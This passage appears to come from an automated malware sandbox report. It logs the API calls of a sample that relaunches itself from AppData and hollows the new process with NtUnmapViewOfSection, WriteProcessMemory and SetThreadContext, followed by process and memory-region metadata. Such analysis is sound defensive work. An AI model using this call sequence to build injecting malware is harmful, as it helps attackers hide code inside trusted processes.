(hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0099.911] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0099.911] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0099.911] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0099.911] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0099.911] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0099.911] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0099.911] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0099.911] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0100.153] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x201cc [0100.294] PostMessageA (hWnd=0x201cc, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0100.294] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0100.294] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0100.294] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x150000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.294] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.294] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xc40, dwThreadId=0xc44)) returned 1 [0100.296] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.296] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0100.296] GetThreadContext (in: hThread=0x48, lpContext=0x150000 | out: lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0100.381] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffde008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0100.381] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0100.389] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0100.390] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x1b4850*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4850*, lpNumberOfBytesWritten=0x0) returned 1 [0100.390] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x1b4c50, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0100.390] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x1b4c50*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4c50*, lpNumberOfBytesWritten=0x0) returned 1 [0100.397] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x209250*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x209250*, lpNumberOfBytesWritten=0x0) returned 1 [0100.398] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffde008, lpBuffer=0x1b4984*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4984*, lpNumberOfBytesWritten=0x0) returned 1 [0100.398] SetThreadContext (hThread=0x48, lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0100.398] ResumeThread (hThread=0x48) returned 0x1 [0100.398] CloseHandle (hObject=0x48) returned 1 [0100.398] CloseHandle (hObject=0x4c) returned 1 [0100.398] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0100.399] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0100.399] ExitProcess (uExitCode=0x0) Process: id = "25" image_name = "lsfkrhur.exe" filename = "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe" page_root = "0x7ea16960" os_pid = "0xc14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xba4" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1551 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1552 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1553 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1554 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1555 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = 